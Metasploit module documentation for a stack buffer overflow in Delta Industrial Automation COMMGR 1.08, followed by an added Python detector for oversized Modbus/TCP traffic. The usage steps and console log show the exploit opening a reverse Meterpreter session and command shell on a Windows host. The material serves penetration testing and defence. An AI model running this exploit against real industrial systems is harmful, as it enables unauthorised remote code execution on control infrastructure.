## Vulnerable Application
Delta Electronics Delta Industrial Automation COMMGR 1.08 is affected by a stack-based buffer overflow vulnerability which can be leveraged by an attacker to execute arbitrary code. This module has been tested successfully on Windows XP SP3, Windows 7 SP1, and Windows 8.1. The vulnerable application is available for download at http://www.deltaww.com/Products/PluginWebUserControl/downloadCenterCounter.aspx?DID=7763&DocPath=1&hl=en-US.
## Verification Steps
1. Install Delta Industrial Automation COMMGR 1.08
2. Start ```msfconsole```
3. Do ```use exploit/windows/scada/delta_ia_commgr_bof```
4. Do ```set RHOST <target_ip>```
5. Do ```run```
6. You should get a shell. :)
## Scenarios
### Delta Industrial Automation COMMGR 1.08 on Windows 7 SP1
```
msf > use exploit/windows/scada/delta_ia_commgr_bof
msf exploit(windows/scada/delta_ia_commgr_bof) > show options

Module options (exploit/windows/scada/delta_ia_commgr_bof):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   RHOST                   yes       The target address
   RPORT  502              yes       The target port (TCP)


Exploit target:

   Id  Name
   --  ----
   0   COMMGR 1.08 / Windows Universal

msf exploit(windows/scada/delta_ia_commgr_bof) > set RHOST 192.168.3.64
RHOST => 192.168.3.64
msf exploit(windows/scada/delta_ia_commgr_bof) > run
[*] Started reverse TCP handler on 192.168.3.150:4444
[*] 192.168.3.64:502 - Trying target COMMGR 1.08 / Windows Universal, sending 4601 bytes...
[*] Sending stage (179779 bytes) to 192.168.3.64
[*] Meterpreter session 1 opened (192.168.3.150:4444 -> 192.168.3.64:49170) at 2018-09-18 23:38:51 -0700
meterpreter > sysinfo
Computer        : TEST01
OS              : Windows 7 (Build 7601, Service Pack 1).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/windows
meterpreter > shell
Process 932 created.
Channel 1 created.
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Program Files (x86)\Delta Industrial Automation\COMMGR 1.08>exit
exit
meterpreter > exit
[*] Shutting down Meterpreter...
[*] 192.168.3.64 - Meterpreter session 1 closed. Reason: User exit
msf exploit(windows/scada/delta_ia_commgr_bof) >
```
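
## Detection Example

A defensive check for the traffic pattern in the run above (a single 4601-byte send to TCP 502), added here as an example and not part of the module or the Metasploit project. It assumes legitimate traffic to port 502 on the monitored network is Modbus/TCP, whose frames never exceed 260 bytes, and that payloads are already reassembled; the function names, event tuples and addresses are constructed for illustration.

```python
import struct

MODBUS_TCP_PORT = 502          # RPORT shown in the module options above
MBAP_LEN = 7                   # transaction id, protocol id, length (2 bytes each) + unit id
MAX_ADU = MBAP_LEN + 253       # largest legal Modbus/TCP frame: 260 bytes

def inspect_payload(payload: bytes) -> list:
    """Return the reasons a TCP payload is not a sequence of well-formed Modbus/TCP frames."""
    findings, offset = [], 0
    while offset < len(payload):
        if len(payload) - offset < MBAP_LEN + 1:      # header plus a function code
            findings.append(f"truncated frame at offset {offset}")
            break
        _tid, proto, length, _unit = struct.unpack_from(">HHHB", payload, offset)
        if proto != 0:
            findings.append(f"protocol id 0x{proto:04x} at offset {offset} is not 0")
            break
        if not 2 <= length <= 254:                    # unit id + PDU of 1..253 bytes
            findings.append(f"length field {length} at offset {offset} out of range")
            break
        if offset + 6 + length > len(payload):
            findings.append(f"frame at offset {offset} runs past end of payload")
            break
        offset += 6 + length
    if findings and len(payload) > MAX_ADU:
        findings.append(f"{len(payload)} bytes exceeds the {MAX_ADU}-byte frame maximum")
    return findings

def scan(events):
    """Return (source, findings) for payloads sent to port 502 that fail inspection."""
    alerts = []
    for src, dport, payload in events:
        if dport == MODBUS_TCP_PORT:
            findings = inspect_payload(payload)
            if findings:
                alerts.append((src, findings))
    return alerts

# Constructed sample traffic (not captured data, not the module's payload).
VALID_READ = struct.pack(">HHHBBHH", 1, 0, 6, 1, 3, 0, 10)   # read 10 holding registers
SAMPLE_EVENTS = [
    ("10.0.0.5", 502, VALID_READ),
    ("10.0.0.5", 502, VALID_READ * 2),          # two pipelined requests
    ("10.0.0.99", 502, b"\x41" * 4601),         # filler bytes, same size as the run above
    ("10.0.0.7", 443, b"\x41" * 4601),          # other port, ignored
]

if __name__ == "__main__":
    for src, findings in scan(SAMPLE_EVENTS):
        print(src, "; ".join(findings))
```

The same framing and size limits can be expressed as an IDS rule on port 502 where a Python sensor is not available.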